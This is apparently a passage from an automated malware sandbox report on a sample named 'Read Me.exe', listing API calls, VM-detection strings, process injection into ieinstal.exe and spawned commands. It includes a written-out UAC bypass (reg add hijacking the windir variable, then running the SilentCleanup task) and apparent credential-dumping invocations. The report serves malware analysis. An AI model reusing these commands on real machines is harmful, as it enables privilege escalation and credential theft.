raits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,12_2_00407183
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_00404648 _EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QA12_2_00404648
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_004126D3 wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,12_2_004126D3
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_00404AD4 wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,tolower,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,12_2_00404AD4
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_00403315 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,12_2_00403315
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 15_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,15_2_00407898
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 16_2_0040702D FindFirstFileA,FindNextFileA,strlen,strlen,16_2_0040702D
Contains functionality to query local drivesShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_00403B9A ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ,?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,GetLogicalDriveStringsA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z,?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$ch12_2_00403B9A
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)Show sources
Source: reg.exe, 00000006.00000002.1103175363.0000000003680000.00000002.00000001.sdmp, reg.exe, 00000008.00000002.1106832862.00000000002E0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: Read Me.exe, 00000000.00000002.1124921394.0000000000869000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
Source: reg.exe, 00000006.00000002.1103175363.0000000003680000.00000002.00000001.sdmp, reg.exe, 00000008.00000002.1106832862.00000000002E0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: reg.exe, 00000006.00000002.1103175363.0000000003680000.00000002.00000001.sdmp, reg.exe, 00000008.00000002.1106832862.00000000002E0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: Read Me.exe, 00000000.00000002.1135662332.0000000004555000.00000004.00000001.sdmp, Dprgees.exe, 0000000B.00000002.1155969629.00000000044A8000.00000004.00000001.sdmp, Dprgees.exe, 00000012.00000002.1187434945.0000000002BF8000.00000004.00000001.sdmpBinary or memory string: 68>qunOOTIGFS<$kf{kbU`|yzcfhCD\8,aik}Pyzgnqp@MG{veJOO=HGFS20IFJT>.mn~aeXvwr`ioBE_0+n`guZwrhn|qANO|ylFGS<$hkdmbk{`
Source: reg.exe, 00000006.00000002.1103175363.0000000003680000.00000002.00000001.sdmp, reg.exe, 00000008.00000002.1106832862.00000000002E0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Program exit pointsShow sources
Source: C:\Users\user\Dprg\Dprgest.exeAPI call chain: ExitProcess graph end nodegraph_10-3859
Source: C:\Users\user\Dprg\Dprgest.exeAPI call chain: ExitProcess graph end nodegraph_10-3746
Queries a list of all running processesShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging:

barindex
Contains functionality to dynamically determine API callsShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_004099CD LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,12_2_004099CD

HIPS / PFW / Operating System Protection Evasion:

barindex
Allocates memory in foreign processesShow sources
Source: C:\Users\user\Dprg\Dprgees.exeMemory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 400000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Dprg\Dprgees.exeMemory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 400000 protect: page execute and read and writeJump to behavior
Contains functionality to inject code into remote processesShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_0040F13D _EH_prolog,CloseHandle,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,12_2_0040F13D
Injects a PE file into a foreign processesShow sources
Source: C:\Users\user\Dprg\Dprgees.exeMemory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 400000 value starts with: 4D5AJump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeMemory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 400000 value starts with: 4D5AJump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeMemory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 400000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Dprg\Dprgees.exeMemory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 400000 value starts with: 4D5AJump to behavior
Writes to foreign memory regionsShow sources
Source: C:\Users\user\Dprg\Dprgees.exeMemory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 400000Jump to behavior
Source: C:\Users\user\Dprg\Dprgees.exeMemory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 7C4008Jump to behavior
Source: C:\Users\user\Dprg\Dprgees.exeMemory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 400000Jump to behavior
Source: C:\Users\user\Dprg\Dprgees.exeMemory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 814008Jump to behavior
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)Show sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: GetCurrentProcessId,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,OpenMutexA,CloseHandle,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,OpenProcess,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,_wgetenv,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,_wgetenv,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,CloseHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, \svchost.exe12_2_0040A64B
Contains functionality to simulate mouse eventsShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_0040FC80 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,mouse_event,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,12_2_0040FC80
Creates a process in suspended mode (likely to inject code)Show sources
Source: C:\Users\user\Desktop\Read Me.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add hkcu\Environment /v windir /d 'cmd /c start /min C:\Users\Public\Yako.bat reg delete hkcu\Environment /v windir /f && REM 'Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /IJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Users\user\Dprg\Dprgest.exe 'C:\Users\user\Dprg\Dprgest.exe' Jump to behavior
Source: C:\Users\user\Dprg\Dprgees.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exeJump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Program Files (x86)\internet explorer\ieinstal.exe' /stext 'C:\Users\user\AppData\Local\Temp\lstte'Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Program Files (x86)\internet explorer\ieinstal.exe' /stext 'C:\Users\user\AppData\Local\Temp\vnyefbbqt'Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Program Files (x86)\internet explorer\ieinstal.exe' /stext 'C:\Users\user\AppData\Local\Temp\gplwytmjpfze'Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Users\user\Dprg\Dprgest.exe 'C:\Users\user\Dprg\Dprgest.exe' Jump to behavior
Source: C:\Users\user\Dprg\Dprgees.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exeJump to behavior
May try to detect the Windows Explorer process (often used for injection)Show sources
Source: ieinstal.exe, 0000000C.00000002.1504346215.000000000518F000.00000004.00000001.sdmpBinary or memory string: 0|cmd|Program Manager|cmd|3936828|cmd|4373859R@9
Source: ieinstal.exe, 0000000C.00000002.1504346215.000000000518F000.00000004.00000001.sdmpBinary or memory string: 0|cmd|Program Manager|cmd|3936828|cmd|
Source: ieinstal.exe, 0000000C.00000002.1504346215.000000000518F000.00000004.00000001.sdmpBinary or memory string: Program Managerr|cmd|937360|cmd|4285828@
Source: ieinstal.exe, 0000000C.00000002.1504346215.000000000518F000.00000004.00000001.sdmpBinary or memory string: 0|cmd|Program Managercmd|937360
Source: ieinstal.exe, 0000000C.00000002.1504346215.000000000518F000.00000004.00000001.sdmpBinary or memory string: 0|cmd|Program Managercmd|3936985
Source: ieinstal.exe, 0000000C.00000002.1501793989.0000000000940000.00000004.00000040.sdmpBinary or memory string: Program Manager
Source: ieinstal.exe, 0000000C.00000002.1504346215.000000000518F000.00000004.00000001.sdmpBinary or memory string: 0|cmd|Program Manager|cmd|h
Source: ieinstal.exe, 0000000C.00000002.1504346215.000000000518F000.00000004.00000001.sdmpBinary or memory string: 0|cmd|Program Manager|cmd|3936828cmd|4363843
Source: ieinstal.exe, 0000000C.00000002.1504346215.000000000518F000.00000004.00000001.sdmpBinary or memory string: 0|cmd|Program Manager|cmd|3937172|cmd|
Source: ieinstal.exe, 0000000C.00000002.1504346215.000000000518F000.00000004.00000001.sdmpBinary or memory string: 0|cmd|Program Manager|cmd|3937500|cmd|4343812v
